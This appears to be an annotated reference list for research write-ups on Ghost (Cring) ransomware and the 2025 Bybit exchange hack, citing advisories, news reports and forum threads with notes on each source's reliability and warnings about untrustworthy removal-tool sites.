- UK secretly orders Apple to let it spy on iPhone users worldwide (February 7, 2025)
New Insights on Ghost's Unique Success
- "#StopRansomware: Ghost (Cring) Ransomware (PDF)" - FBI, CISA, and MS-ISAC Joint Advisory (2025, February 19)
- "#StopRansomware: Ghost (Cring) Ransomware (Website)" - CISA (2025, February 19)
- "ランサムウェア「Cring」の被害が国内で拡大、VPN脆弱性を狙い侵入" // "Ransomware 'Cring' spread in the country, intruding for VPN vulnerability" (Translation by Reverso Context) - (Japanese) Trend Micro (2021, May 20)
- "Ghost Ransomware: Striking Before You Even Know It’s There" - Vectra (2025, February 26)
- "Ghost ransomware virus - removal and decryption options" - PCrisk (2023, December 8)
- "Ransomware-Liste inkl. Decryptor (zum Entschlüsseln)" (German) (2024)
- "Шифровальщики-вымогатели - The Digest "Crypto-Ransomware: Cring Hand-Ransomware, Crypt3r Ransomware, Variants: CRING, RSA, Vjiszy1lo, Ghost, Phantom, VnBeHa99y, Pay4it" - (Russian) Amigo-A (2021, January 14)
- "Шифровальщики-вымогатели - The Digest "Crypto-Ransomware: Parasite Ransomware, Aliases: SharpCrypter, Paralock" - (Russian) Amigo-A (2021, January 4)
- "Ransomware Research - Cring" - elastio (n.d.)
- "Ransomware Research - Parasite" elastio (n.d.)
- "2022 年 6 月勒索病毒态势分析" - (Chinese) ioc.one (???) <- If you can find out more from this source, please let me know!
- "国家互联网应急中心(CNCERT/CC) - 勒索软件动态周报" - (Chinese Intelligence Report on Ransomware) (2022, June) <- Translated and summarized with GPT-4o via duck.ai, and with Reverso Context
- "Sectrio Malware Report" (2022) <- Only used in a rabbit hole I went down to see whether or not I could trust a different source that provided potential emails used by Ghost (like starmoon@my[.]com, bleepbloopbop@protonmail[.]com, and r3wuq@tuta[.]io). I found that I couldn't and these emails are likely not related to Ghost.
- "Unpatched vulnerable VPN servers hit by Cring ransomware" (2021, April 8)
- References this insightful Kaspersky report: "Vulnerability in FortiGate VPN servers is exploited in Cring ransomware attacks" (2021, April 7)
- "T1055 Process Injection" - MITRE ATT&CK (2023, March 30)
- "Services on NBU Clients" - Veritas (2011)
- "A new #Cring #Ransomware" - Amigo-A on Twitter/X (2021, January 21)
- "!!!!deReadMe!!!.txt" - Pastebin from Demonslay335 (one of the researchers related to the BleepingComputer forums that initially investigated Cring) (2021, January 26th)
- "What Are Malicious Newly Registered Domains?" - Palo Alto Networks (n.d.) <- Used, alongside AI, to determine what the advantages and drawbacks of a ransomware gang registering and hardcoding a domain versus an IP address are.
- "CISA and FBI Report Ghost Ransomware Breached 70 Countries" (2025, February 21)
- "FBI warns a cyber attack under way and you should back up your data" (2025, February 21)
- "FBI Says Backup Now - Advisory Warns Of Dangerous Ransomware Attacks" (2025, February 22)
- "Warning issued over prolific 'Ghost' ransomware group" (2025, February 24)
- "Cring Ransomware" - NHS England (2021, April 13) <- This initially led to a huge pivot off of the "Vjiszy1lo" name/alias associated with Ghost. Presumably the federal government will have done their due diligence and verified this information.
- "New Cring ransomware hits unpatched Fortinet VPN devices" (2021, April 7)
- "Cring ransomware group exploits ancient ColdFusion server" (2021, September 21)
- "Shadow-Pulse/Ransomlist.csv" (List of ransomware gangs, aliases, algorithms, etc.) <- Note that, despite the rich information, I cannot verify any of the information in this resource as-is.
- "Common TTPs of modern ransomware groups" - Kaspersky via Wayback Machine (2022) <- The only information utilized in this report was the graph that stated that Cring emerged in December 2020.
- "RSA Virus Files of Ransomware - How to remove Cring virus?" (2021, February 17) <- Do not download any tools from this article.
- "Remove Cring Ransomware" (2023, January 3) <- Do not download any tools from this article.
- "How to remove Cring Ransomware and decrypt .cring" (2021, February 17) <- ABSOLUTELY do not download any tools from this article. One of the first links is to Afflat3b2.com, a known distributor of malware and PUPs. (Article with more information on Afflat3b2)
- "xtaci/smux" (Stream Multiplexing Library for golang) <- Linked in analysis of cring.exe on Hybrid Analysis
- Ransomware Time-to-Ransom and Monetary Statistics:
  - "2025 Cyber Threat Report" - Huntress (2025, February 5) <- Note that the data for this report is from 2024.
    - Linked from this article: "Dwell Time Reduced Further as Attackers Infect in Four Hours" (2025, February 17)
  - "Ransomware Dwell Time Hits Low Of 24 Hours" - Secureworks/Sophos (2023, October 5)
  - "Roundup: The top ransomware stories of 2024"
- Other Parasite/Paras1te-specific sources (used to determine links and distinctions between Ghost and Parasite):
  - "Parasite ransomware targeting French users actively spreading in the wild" (2021, February 26)
  - "Parasite Ransomware (.arazite)" (2021, May 3)
  - "How to remove Paras1te ransomware from the infected machine" - PCrisk (2021, November 7)
  - "Paras1te Ransomware" (2021, February 10)
- BleepingComputer Forums:
  - "Crypt3r (Cringe/Ghost/Cring) Ransomware (.cring, .phantom) Support Topic" (2021, January 19)
  - "Ransomware infected, File extension .Pay4IT" (2021, April 10)
  - "ransomware Cring Hand - Crypt3r" (2021, October 24)
  - "MS17-010 - ETERNALBLUE - Exploit" (2020, January 22)
  - ".vjiszy1lo extension, no ransom note." (2021, March 4)
Hackers Steal $1.46 Billion in Cryptocurrency Assets From Bybit Exchange
- "Bybit Confirms Security Integrity Amid Safe{Wallet} Incident – No Compromise in Infrastructure" (2025, February 26)
- "Safe{Wallet} Statement on Targeted Attack on Bybit" (2025, February 26)
- "LazarusBounty" (2025, February 23)
- "Bybit Releases API of Suspicious Wallet on "Black List" as Part of Recovery Bounty Program" (2025, February 23)
- "Bybit Hack Report" (n.d.)
- "North Korea Responsible for $1.5 Billion Bybit Hack" (2025, February 26)
- "Technical Analysis of the Bybit Hot Wallet Exploit" (2025, February 24)
- "Bybit Hack Traced to Safe{Wallet} Supply Chain Attack Exploited by North Korean Hackers" (2025, February 27)
- "Bybit hacker launders $605M ETH, over 50% of stolen funds" (2025, February 28)
- "FBI confirms Lazarus hackers were behind $1.5B Bybit crypto heist" (2025, February 27)
- "TraderTraitor: North Korean State-Sponsored APT Targets Blockchain Companies" (2022, April 18)
- "Lazarus hacked Bybit via breached Safe{Wallet} developer machine" (2025, February 26)
- "Hacked crypto exchange Bybit offers $140M bounty to trace stolen funds" (2025, February 26)
- "Bybit has 'fully closed the ETH gap' CEO says after $1.4B Lazarus hack" (2025, February 24)
- "Crypto exchange Bybit says it was hacked and lost around $1.4B" (2025, February 21)
- "Hacker steals record $1.46 billion from Bybit ETH cold wallet" (2025, February 21)
- "Bybit Loses $1.5B in Hack but Can Cover Loss, CEO Confirms" (2025, February 21)
- "Cold Storage: What It Is, How It Works, Theft Protection" (2025, February 10)